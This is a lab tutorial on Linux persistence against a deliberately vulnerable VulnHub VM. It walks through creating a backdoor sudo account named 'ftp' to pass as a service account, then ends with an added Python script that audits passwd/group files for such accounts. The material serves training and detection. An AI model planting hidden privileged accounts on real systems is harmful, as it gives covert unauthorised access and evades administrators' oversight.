- Kali Linux OR Parrot OS
- Practical understanding of TCP/IP
- This tutorial was conducted against a deliberately vulnerable Linux virtual machine set up to demonstrate exploitation and privilege escalation. It can be downloaded here:
https://www.vulnhub.com/entry/raven-1,256/
Goal:
The intention is to secure a presence on the Linux target once an initial entry point has been acquired.
PART 3. CREATING A PRIVILEGED LOCAL ACCOUNT:
* Take note: You need "root" permission to create a new user account on Linux systems.
Creating a privileged local account for backdoor access is a technique for keeping access to a system even if the password of the account originally compromised is changed. However, a new local user is easy to spot on servers that have few user and service accounts, so creating one may lead to detection.
To make the account less conspicuous, we will give it a name that blends in. In this example the account is named "ftp" so that it looks like a service account.
We create the user account on the target by running:
useradd -m -s /bin/bash ftp
Once the account exists, add the user to the "sudo" group, which grants it administrative rights:
usermod -aG sudo ftp
After adding the user to the "sudo" group, set a password for the account:
passwd ftp
Once the password is set, list the contents of /etc/passwd to confirm that the account was added.
smmta:x:100:104:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
smmsp:x:101:105:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
ethical:x:1001:1001::/home/ethical:/bin/sh
ftp:x:1002:1002::/home/ftp:/bin/bash
You can now log in to the new account over SSH with password authentication. You can also add the SSH public key generated in the first part to the "authorized_keys" file in the account's home directory, as described in [Linux Persistence] | VIA SSH KEYS - PART 1.
After authenticating to the server over SSH, confirm that the account has administrative rights by running a command with "sudo".
ftp@ethical:/root$ cd ~
ftp@ethical:~$ sudo apt update
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for ftp:
As the terminal output above shows, the account has administrative privileges and can run any command on the machine without touching the "root" account.
This account provides backdoor access whenever it is needed, avoiding the use of the "root" account or any other legitimate user account on the target while keeping full access to it.
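From the defender's side, the steps above leave artefacts in /etc/passwd and /etc/group: a new UID >= 1000 account with an interactive shell, membership in the "sudo" group, and a name that collides with a daemon's. The script below is an added example, not code from the original post; it parses constructed passwd/group samples (the mysql/ethical/ftp lines mirror the listing above) and reports accounts that match those traits.

```python
# Added example from a defender's view; not code from the original post. It audits
# passwd/group data for what the technique above leaves behind: a UID >= 1000 account
# with an interactive shell that is in a privilege group and/or reuses a daemon name.
# Sample inputs are constructed; on a real host read /etc/passwd and /etc/group.

PRIV_GROUPS = {"sudo", "wheel", "admin"}  # membership here means root via sudo
NOLOGIN_SHELLS = {"/bin/false", "/usr/sbin/nologin", "/sbin/nologin"}
DAEMON_NAMES = {"ftp", "mysql", "www-data", "backup", "mail", "smmta", "smmsp"}

# Constructed sample data; the mysql/ethical/ftp passwd lines mirror the post's listing.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
mysql:x:102:106:MySQL Server,,,:/nonexistent:/bin/false
ethical:x:1001:1001::/home/ethical:/bin/sh
ftp:x:1002:1002::/home/ftp:/bin/bash
"""
SAMPLE_GROUP = """sudo:x:27:ethical,ftp
ftp:x:1002:
"""

def parse_passwd(text):
    """Map user name -> {uid, gid, shell} from passwd(5)-formatted text."""
    users = {}
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            name, _, uid, gid, _, _, shell = line.split(":", 6)
            users[name] = {"uid": int(uid), "gid": int(gid), "shell": shell}
    return users

def parse_group(text):
    """Map group name -> (gid, {members}) from group(5)-formatted text."""
    groups = {}
    for line in text.splitlines():
        if line.strip() and not line.startswith("#"):
            gname, _, gid, members = line.split(":", 3)
            groups[gname] = (int(gid), {m for m in members.split(",") if m})
    return groups

def audit(passwd_text, group_text):
    """Return {user: [reasons]} for every account that deserves a second look."""
    users, groups = parse_passwd(passwd_text), parse_group(group_text)
    priv_gids = {groups[g][0] for g in PRIV_GROUPS if g in groups}
    priv_members = set().union(*(groups[g][1] for g in PRIV_GROUPS if g in groups))
    findings = {}
    for name, u in users.items():
        reasons = []
        if name in priv_members or u["gid"] in priv_gids:  # secondary or primary group
            reasons.append("in privilege group")
        if name in DAEMON_NAMES and u["shell"] not in NOLOGIN_SHELLS:
            reasons.append("daemon name with interactive shell")
        if reasons:
            findings[name] = reasons
    return findings
```

Running audit() on the samples flags "ftp" on both counts and "ethical" only for its sudo membership, while the real mysql service account (nologin shell, no privilege group) is not reported.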